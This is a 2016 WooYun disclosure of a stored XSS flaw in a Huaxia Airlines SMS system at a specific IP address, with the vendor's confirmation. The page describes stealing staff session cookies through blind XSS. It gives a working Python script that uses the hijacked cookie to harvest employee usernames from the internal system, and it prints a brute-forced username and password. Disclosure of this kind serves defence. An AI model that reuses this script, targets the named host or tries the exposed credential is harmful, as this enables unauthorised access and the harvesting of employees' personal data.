当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2016-0200642

漏洞标题:华夏航空某系统存储型XSS漏洞(已登录系统)

相关厂商:华夏航空有限公司

漏洞作者: jianFen

提交时间:2016-04-26 06:22

修复时间:2016-06-10 15:30

公开时间:2016-06-10 15:30

漏洞类型:XSS 跨站脚本攻击

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2016-04-26: 细节已通知厂商并且等待厂商处理中
2016-04-26: 厂商已经确认,细节仅向厂商公开
2016-05-06: 细节向核心白帽子及相关领域专家公开
2016-05-16: 细节向普通白帽子公开
2016-05-26: 细节向实习白帽子公开
2016-06-10: 细节向公众公开

简要描述:

华夏航空~

详细说明:

http://222.178.225.36:8083/SMS/
自愿报告出可直接插入xss
http://222.178.225.36:8083/SMS/freeWill.json
成功打到cookies

5.png


虽然是内网直接外网加cookies即可

1.png


2.png


内部员工账号

4.png


爬取之

#coding=utf-8
import requests
import re
from lxml import etree
import time
import threading
import sys
sys.getdefaultencoding()
reload(sys)
sys.setdefaultencoding('UTF-8')
sys.getdefaultencoding()
def postcode(pageId):
	url = "http://222.178.225.36:8083/SMS/queryCheckPerson.json"
	
	head = {
	'Host': '222.178.225.36:8083',
	'Proxy-Connection': 'keep-alive',
	'Content-Length': '71',
	'Origin': 'http://222.178.225.36:8083',
	'X-Requested-With': 'XMLHttpRequest',
	'User-Agent': 'Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/38.0.2125.122 Safari/537.36 SE 2.X MetaSr 1.0',
	'Content-Type': 'application/x-www-form-urlencoded; charset=UTF-8',
	'Accept': '*/*',
	'Referer': 'http://222.178.225.36:8083/SMS/choosePerson.json',
	'Accept-Encoding': 'gzip,deflate',
	'Accept-Language': 'zh-CN,zh;q=0.8',
	'Cookie': 'JSESSIONID******'
	}
	data= "start="+pageId+"&limit=15&sort=ID&dir=ASC&dept=&role=&userRealName=&workNumber="
	proxy={'http':'127.0.0.1:8080'}
	key = requests.post(url,headers=head,data=data,proxies=proxy)
	#print key.headers
	calc = key.text
	num =  re.findall('USERNAME":"(.*?)"}',calc,re.S)
	print num
	fp1 = open("C:\Users\Administrator\Desktop\\loginname.txt",'a')
	for i in num:
		fp1.write(''.join(i.split())+'\n')
	print 'page spider full'
print u'开始抓取'
count = 15
for i in range(0,48):
	pageId = count
	count += 15
	postcode(str(count))


再爆破又获得一枚 但是权限不如盲打的高
rangxy/rangxy123
系统弱口令确实少了 经过wooyun检测

漏洞证明:

一些项目

3.png


修复方案:

1.过滤XSS

版权声明:转载请注明来源 jianFen@乌云

漏洞回应

厂商回应:

危害等级:中

漏洞Rank:10

确认时间:2016-04-26 15:28

厂商回复:

非常感谢关注华夏航空,该xss前几日我刚测试出来,还没来得及修复。

最新状态:

暂无